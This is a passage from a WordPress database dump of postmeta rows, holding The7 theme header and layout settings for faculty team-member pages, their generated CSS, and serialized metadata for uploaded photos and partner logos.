(30472,3955,'_thumbnail_id','3956'),
(30473,3955,'_edit_last','1'),
(30474,3955,'_dt_sidebar_position','disabled'),
(30475,3955,'_dt_sidebar_widgetarea_id','sidebar_1'),
(30476,3955,'_dt_sidebar_hide_on_mobile','0'),
(30477,3955,'_dt_footer_show','1'),
(30478,3955,'_dt_footer_widgetarea_id','sidebar_2'),
(30479,3955,'_dt_footer_hide_on_mobile','0'),
(30480,3955,'_dt_header_title','fancy'),
(30481,3955,'_dt_header_background','normal'),
(30482,3955,'_dt_header_background_below_slideshow','disabled'),
(30483,3955,'_dt_header_transparent_bg_color_scheme','light'),
(30484,3955,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(30485,3955,'_dt_header_transparent_top_bar_bg_opacity','25'),
(30486,3955,'_dt_header_transparent_bg_color','#000000'),
(30487,3955,'_dt_header_transparent_bg_opacity','50'),
(30488,3955,'_dt_header_disabled_background','normal'),
(30489,3955,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(30490,3955,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(30491,3955,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(30492,3955,'_dt_header_disabled_transparent_bg_color','#000000'),
(30493,3955,'_dt_header_disabled_transparent_bg_opacity','50'),
(30494,3955,'_dt_page_overrides_top_margin',''),
(30495,3955,'_dt_page_overrides_right_margin',''),
(30496,3955,'_dt_page_overrides_bottom_margin',''),
(30497,3955,'_dt_page_overrides_left_margin',''),
(30498,3955,'_dt_mobile_page_padding_top',''),
(30499,3955,'_dt_mobile_page_padding_right',''),
(30500,3955,'_dt_mobile_page_padding_bottom',''),
(30501,3955,'_dt_mobile_page_padding_left',''),
(30502,3955,'_dt_fancy_header_layout_heading',''),
(30503,3955,'_dt_fancy_header_title_aligment','center'),
(30504,3955,'_dt_fancy_header_height','300'),
(30505,3955,'_dt_fancy_header_padding-top','0px'),
(30506,3955,'_dt_fancy_header_padding-bottom','0px'),
(30507,3955,'_dt_fancy_header_breadcrumbs_heading',''),
(30508,3955,'_dt_fancy_header_breadcrumbs','disabled'),
(30509,3955,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(30510,3955,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(30511,3955,'_dt_fancy_header_title_heading',''),
(30512,3955,'_dt_fancy_header_title_mode','custom'),
(30513,3955,'_dt_fancy_header_title','Prof. Alaa M. Morsy'),
(30514,3955,'_dt_fancy_header_title_font_size','30'),
(30515,3955,'_dt_fancy_header_title_line_height','36'),
(30516,3955,'_dt_fancy_header_text_transform','none'),
(30517,3955,'_dt_fancy_header_title_color_mode','color'),
(30518,3955,'_dt_fancy_header_title_color','#ffffff'),
(30519,3955,'_dt_fancy_header_subtitle_heading',''),
(30520,3955,'_dt_fancy_header_subtitle',''),
(30521,3955,'_dt_fancy_header_subtitle_font_size','18'),
(30522,3955,'_dt_fancy_header_subtitle_line_height','26'),
(30523,3955,'_dt_fancy_header_subtitle_text_transform','none'),
(30524,3955,'_dt_fancy_header_subtitle_color_mode','color'),
(30525,3955,'_dt_fancy_header_subtitle_color','#ffffff'),
(30526,3955,'_dt_fancy_header_bg_heading',''),
(30527,3955,'_dt_fancy_header_bg_color','#222222'),
(30528,3955,'_dt_fancy_header_bg_image_origin','custom'),
(30529,3955,'_dt_fancy_header_bg_image','a:0:{}'),
(30530,3955,'_dt_fancy_header_bg_repeat','no-repeat'),
(30531,3955,'_dt_fancy_header_bg_position_x','center'),
(30532,3955,'_dt_fancy_header_bg_position_y','center'),
(30533,3955,'_dt_fancy_header_bg_fullscreen','1'),
(30534,3955,'_dt_fancy_header_bg_overlay','0'),
(30535,3955,'_dt_fancy_header_overlay_color','#000'),
(30536,3955,'_dt_fancy_header_bg_overlay_opacity','50'),
(30537,3955,'_dt_fancy_header_scroll_effect','default'),
(30538,3955,'_dt_fancy_header_bg_parallax','0.5'),
(30539,3955,'_dt_fancy_header_responsiveness_heading',''),
(30540,3955,'_dt_fancy_header_responsiveness','enabled'),
(30541,3955,'_dt_fancy_header_responsiveness_switch','778px'),
(30542,3955,'_dt_fancy_header_responsive_height','70'),
(30543,3955,'_dt_fancy_header_responsive_font_size','30'),
(30544,3955,'_dt_fancy_header_responsive_title_line_height','38'),
(30545,3955,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(30546,3955,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(30547,3955,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(30548,3955,'_dt_teammate_options_go_to_single','1'),
(30549,3955,'_dt_teammate_options_position',''),
(30550,3955,'_dt_teammate_options_website',''),
(30551,3955,'_dt_teammate_options_mail',''),
(30552,3955,'_dt_teammate_options_facebook',''),
(30553,3955,'_dt_teammate_options_twitter',''),
(30554,3955,'_dt_teammate_options_dribbble',''),
(30555,3955,'_dt_teammate_options_you-tube',''),
(30556,3955,'_dt_teammate_options_rss',''),
(30557,3955,'_dt_teammate_options_delicious',''),
(30558,3955,'_dt_teammate_options_flickr',''),
(30559,3955,'_dt_teammate_options_lastfm',''),
(30560,3955,'_dt_teammate_options_linkedin',''),
(30561,3955,'_dt_teammate_options_vimeo',''),
(30562,3955,'_dt_teammate_options_tumbler',''),
(30563,3955,'_dt_teammate_options_pinterest',''),
(30564,3955,'_dt_teammate_options_devian',''),
(30565,3955,'_dt_teammate_options_skype',''),
(30566,3955,'_dt_teammate_options_github',''),
(30567,3955,'_dt_teammate_options_instagram',''),
(30568,3955,'_dt_teammate_options_stumbleupon',''),
(30569,3955,'_dt_teammate_options_behance',''),
(30570,3955,'_dt_teammate_options_px-500',''),
(30571,3955,'_dt_teammate_options_tripedvisor',''),
(30572,3955,'_dt_teammate_options_vk',''),
(30573,3955,'_dt_teammate_options_foursquare',''),
(30574,3955,'_dt_teammate_options_xing',''),
(30575,3955,'_dt_teammate_options_weibo',''),
(30576,3955,'_dt_teammate_options_odnoklassniki',''),
(30577,3955,'_dt_teammate_options_research-gate',''),
(30578,3955,'_dt_teammate_options_yelp',''),
(30579,3955,'_dt_teammate_options_blogger',''),
(30580,3955,'_dt_teammate_options_soundcloud',''),
(30581,3955,'_dt_teammate_options_viber',''),
(30582,3955,'_dt_teammate_options_whatsapp',''),
(30583,3955,'_dt_teammate_options_reddit',''),
(30584,3955,'_dt_teammate_options_snapchat',''),
(30585,3955,'_dt_teammate_options_telegram',''),
(30586,3955,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(30587,3957,'_edit_lock','1680420199:1'),
(30588,3957,'_edit_last','1'),
(30589,3957,'_dt_sidebar_position','disabled'),
(30590,3957,'_dt_sidebar_widgetarea_id','sidebar_1'),
(30591,3957,'_dt_sidebar_hide_on_mobile','0'),
(30592,3957,'_dt_footer_show','1'),
(30593,3957,'_dt_footer_widgetarea_id','sidebar_2'),
(30594,3957,'_dt_footer_hide_on_mobile','0'),
(30595,3957,'_dt_header_title','fancy'),
(30596,3957,'_dt_header_background','normal'),
(30597,3957,'_dt_header_background_below_slideshow','disabled'),
(30598,3957,'_dt_header_transparent_bg_color_scheme','light'),
(30599,3957,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(30600,3957,'_dt_header_transparent_top_bar_bg_opacity','25'),
(30601,3957,'_dt_header_transparent_bg_color','#000000'),
(30602,3957,'_dt_header_transparent_bg_opacity','50'),
(30603,3957,'_dt_header_disabled_background','normal'),
(30604,3957,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(30605,3957,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(30606,3957,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(30607,3957,'_dt_header_disabled_transparent_bg_color','#000000'),
(30608,3957,'_dt_header_disabled_transparent_bg_opacity','50'),
(30609,3957,'_dt_page_overrides_top_margin',''),
(30610,3957,'_dt_page_overrides_right_margin',''),
(30611,3957,'_dt_page_overrides_bottom_margin',''),
(30612,3957,'_dt_page_overrides_left_margin',''),
(30613,3957,'_dt_mobile_page_padding_top',''),
(30614,3957,'_dt_mobile_page_padding_right',''),
(30615,3957,'_dt_mobile_page_padding_bottom',''),
(30616,3957,'_dt_mobile_page_padding_left',''),
(30617,3957,'_dt_fancy_header_layout_heading',''),
(30618,3957,'_dt_fancy_header_title_aligment','center'),
(30619,3957,'_dt_fancy_header_height','300'),
(30620,3957,'_dt_fancy_header_padding-top','0px'),
(30621,3957,'_dt_fancy_header_padding-bottom','0px'),
(30622,3957,'_dt_fancy_header_breadcrumbs_heading',''),
(30623,3957,'_dt_fancy_header_breadcrumbs','disabled'),
(30624,3957,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(30625,3957,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(30626,3957,'_dt_fancy_header_title_heading',''),
(30627,3957,'_dt_fancy_header_title_mode','custom'),
(30628,3957,'_dt_fancy_header_title','Prof. DR. KHALED Ali SHEHATA'),
(30629,3957,'_dt_fancy_header_title_font_size','30'),
(30630,3957,'_dt_fancy_header_title_line_height','36'),
(30631,3957,'_dt_fancy_header_text_transform','none'),
(30632,3957,'_dt_fancy_header_title_color_mode','color'),
(30633,3957,'_dt_fancy_header_title_color','#ffffff'),
(30634,3957,'_dt_fancy_header_subtitle_heading',''),
(30635,3957,'_dt_fancy_header_subtitle',''),
(30636,3957,'_dt_fancy_header_subtitle_font_size','18'),
(30637,3957,'_dt_fancy_header_subtitle_line_height','26'),
(30638,3957,'_dt_fancy_header_subtitle_text_transform','none'),
(30639,3957,'_dt_fancy_header_subtitle_color_mode','color'),
(30640,3957,'_dt_fancy_header_subtitle_color','#ffffff'),
(30641,3957,'_dt_fancy_header_bg_heading',''),
(30642,3957,'_dt_fancy_header_bg_color','#222222'),
(30643,3957,'_dt_fancy_header_bg_image_origin','custom'),
(30644,3957,'_dt_fancy_header_bg_image','a:0:{}'),
(30645,3957,'_dt_fancy_header_bg_repeat','no-repeat'),
(30646,3957,'_dt_fancy_header_bg_position_x','center'),
(30647,3957,'_dt_fancy_header_bg_position_y','center'),
(30648,3957,'_dt_fancy_header_bg_fullscreen','1'),
(30649,3957,'_dt_fancy_header_bg_overlay','0'),
(30650,3957,'_dt_fancy_header_overlay_color','#000'),
(30651,3957,'_dt_fancy_header_bg_overlay_opacity','50'),
(30652,3957,'_dt_fancy_header_scroll_effect','default'),
(30653,3957,'_dt_fancy_header_bg_parallax','0.5'),
(30654,3957,'_dt_fancy_header_responsiveness_heading',''),
(30655,3957,'_dt_fancy_header_responsiveness','enabled'),
(30656,3957,'_dt_fancy_header_responsiveness_switch','778px'),
(30657,3957,'_dt_fancy_header_responsive_height','70'),
(30658,3957,'_dt_fancy_header_responsive_font_size','30'),
(30659,3957,'_dt_fancy_header_responsive_title_line_height','38'),
(30660,3957,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(30661,3957,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(30662,3957,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(30663,3957,'_dt_teammate_options_go_to_single','1'),
(30664,3957,'_dt_teammate_options_position',''),
(30665,3957,'_dt_teammate_options_website',''),
(30666,3957,'_dt_teammate_options_mail',''),
(30667,3957,'_dt_teammate_options_facebook',''),
(30668,3957,'_dt_teammate_options_twitter',''),
(30669,3957,'_dt_teammate_options_dribbble',''),
(30670,3957,'_dt_teammate_options_you-tube',''),
(30671,3957,'_dt_teammate_options_rss',''),
(30672,3957,'_dt_teammate_options_delicious',''),
(30673,3957,'_dt_teammate_options_flickr',''),
(30674,3957,'_dt_teammate_options_lastfm',''),
(30675,3957,'_dt_teammate_options_linkedin',''),
(30676,3957,'_dt_teammate_options_vimeo',''),
(30677,3957,'_dt_teammate_options_tumbler',''),
(30678,3957,'_dt_teammate_options_pinterest',''),
(30679,3957,'_dt_teammate_options_devian',''),
(30680,3957,'_dt_teammate_options_skype',''),
(30681,3957,'_dt_teammate_options_github',''),
(30682,3957,'_dt_teammate_options_instagram',''),
(30683,3957,'_dt_teammate_options_stumbleupon',''),
(30684,3957,'_dt_teammate_options_behance',''),
(30685,3957,'_dt_teammate_options_px-500',''),
(30686,3957,'_dt_teammate_options_tripedvisor',''),
(30687,3957,'_dt_teammate_options_vk',''),
(30688,3957,'_dt_teammate_options_foursquare',''),
(30689,3957,'_dt_teammate_options_xing',''),
(30690,3957,'_dt_teammate_options_weibo',''),
(30691,3957,'_dt_teammate_options_odnoklassniki',''),
(30692,3957,'_dt_teammate_options_research-gate',''),
(30693,3957,'_dt_teammate_options_yelp',''),
(30694,3957,'_dt_teammate_options_blogger',''),
(30695,3957,'_dt_teammate_options_soundcloud',''),
(30696,3957,'_dt_teammate_options_viber',''),
(30697,3957,'_dt_teammate_options_whatsapp',''),
(30698,3957,'_dt_teammate_options_reddit',''),
(30699,3957,'_dt_teammate_options_snapchat',''),
(30700,3957,'_dt_teammate_options_telegram',''),
(30701,3957,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(30702,3958,'_wp_attached_file','2023/03/dr-ayman_adel.bmp'),
(30703,3958,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:156;s:6:\"height\";i:176;s:4:\"file\";s:25:\"2023/03/dr-ayman_adel.bmp\";s:8:\"filesize\";i:82422;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30704,3954,'_thumbnail_id','4031'),
(30705,3959,'_wp_attached_file','2023/03/dr-khaled.bmp'),
(30706,3959,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:140;s:6:\"height\";i:157;s:4:\"file\";s:21:\"2023/03/dr-khaled.bmp\";s:8:\"filesize\";i:65994;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30707,3957,'_thumbnail_id','3959'),
(30710,3961,'_wp_attached_file','2023/03/codecanyon-eJrpSzBr-wpbakery-page-builder-for-wordpress.zip'),
(30711,3961,'_wp_attachment_context','upgrader'),
(30714,3987,'_wp_attached_file','2023/04/BDStar.png'),
(30715,3987,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1281;s:6:\"height\";i:279;s:4:\"file\";s:18:\"2023/04/BDStar.png\";s:8:\"filesize\";i:32143;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"BDStar-300x65.png\";s:5:\"width\";i:300;s:6:\"height\";i:65;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10693;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"BDStar-1024x223.png\";s:5:\"width\";i:1024;s:6:\"height\";i:223;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:59236;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"BDStar-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7123;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"BDStar-768x167.png\";s:5:\"width\";i:768;s:6:\"height\";i:167;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41922;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:18:\"BDStar-500x109.png\";s:5:\"width\";i:500;s:6:\"height\";i:109;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22786;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:18:\"BDStar-800x174.png\";s:5:\"width\";i:800;s:6:\"height\";i:174;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47378;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30716,3988,'_wp_attached_file','2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-scaled.jpg'),
(30717,3988,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:323;s:4:\"file\";s:57:\"2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-scaled.jpg\";s:8:\"filesize\";i:74949;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"Applanix_CYMK_OUTLINES_Horizontal_Blue-300x38.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:38;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5369;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:129;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25535;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"Applanix_CYMK_OUTLINES_Horizontal_Blue-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3588;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:49:\"Applanix_CYMK_OUTLINES_Horizontal_Blue-768x97.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:97;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17936;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:51:\"Applanix_CYMK_OUTLINES_Horizontal_Blue-1536x194.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41315;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:51:\"Applanix_CYMK_OUTLINES_Horizontal_Blue-2048x259.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58646;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:49:\"Applanix_CYMK_OUTLINES_Horizontal_Blue-500x63.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:63;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10684;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:50:\"Applanix_CYMK_OUTLINES_Horizontal_Blue-800x101.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:101;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19639;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:51:\"Applanix_CYMK_OUTLINES_Horizontal_Blue-1280x162.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33620;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:51:\"Applanix_CYMK_OUTLINES_Horizontal_Blue-1920x242.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:242;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54383;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:42:\"Applanix_CYMK_OUTLINES_Horizontal_Blue.jpg\";}'),
(30718,3989,'_wp_attached_file','2023/04/LOGO-of-HDP-center-final0730-1.png'),
(30719,3989,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1224;s:6:\"height\";i:419;s:4:\"file\";s:42:\"2023/04/LOGO-of-HDP-center-final0730-1.png\";s:8:\"filesize\";i:17364;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:42:\"LOGO-of-HDP-center-final0730-1-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5968;}s:5:\"large\";a:5:{s:4:\"file\";s:43:\"LOGO-of-HDP-center-final0730-1-1024x351.png\";s:5:\"width\";i:1024;s:6:\"height\";i:351;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25810;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:42:\"LOGO-of-HDP-center-final0730-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3590;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:42:\"LOGO-of-HDP-center-final0730-1-768x263.png\";s:5:\"width\";i:768;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18131;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:42:\"LOGO-of-HDP-center-final0730-1-500x171.png\";s:5:\"width\";i:500;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10821;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:42:\"LOGO-of-HDP-center-final0730-1-800x274.png\";s:5:\"width\";i:800;s:6:\"height\";i:274;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19304;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30720,3997,'_wp_attached_file','2023/04/Logo_Schriftzug_rgb_R.png'),
(30721,3997,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:3507;s:6:\"height\";i:1249;s:4:\"file\";s:33:\"2023/04/Logo_Schriftzug_rgb_R.png\";s:8:\"filesize\";i:91335;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"Logo_Schriftzug_rgb_R-300x107.png\";s:5:\"width\";i:300;s:6:\"height\";i:107;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10998;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"Logo_Schriftzug_rgb_R-1024x365.png\";s:5:\"width\";i:1024;s:6:\"height\";i:365;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:75731;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"Logo_Schriftzug_rgb_R-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6288;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"Logo_Schriftzug_rgb_R-768x274.png\";s:5:\"width\";i:768;s:6:\"height\";i:274;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40248;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"Logo_Schriftzug_rgb_R-1536x547.png\";s:5:\"width\";i:1536;s:6:\"height\";i:547;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:138562;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:34:\"Logo_Schriftzug_rgb_R-2048x729.png\";s:5:\"width\";i:2048;s:6:\"height\";i:729;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:283074;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:33:\"Logo_Schriftzug_rgb_R-500x178.png\";s:5:\"width\";i:500;s:6:\"height\";i:178;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24626;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:33:\"Logo_Schriftzug_rgb_R-800x285.png\";s:5:\"width\";i:800;s:6:\"height\";i:285;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:53352;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:34:\"Logo_Schriftzug_rgb_R-1280x456.png\";s:5:\"width\";i:1280;s:6:\"height\";i:456;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:123856;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:34:\"Logo_Schriftzug_rgb_R-1920x684.png\";s:5:\"width\";i:1920;s:6:\"height\";i:684;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:237864;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\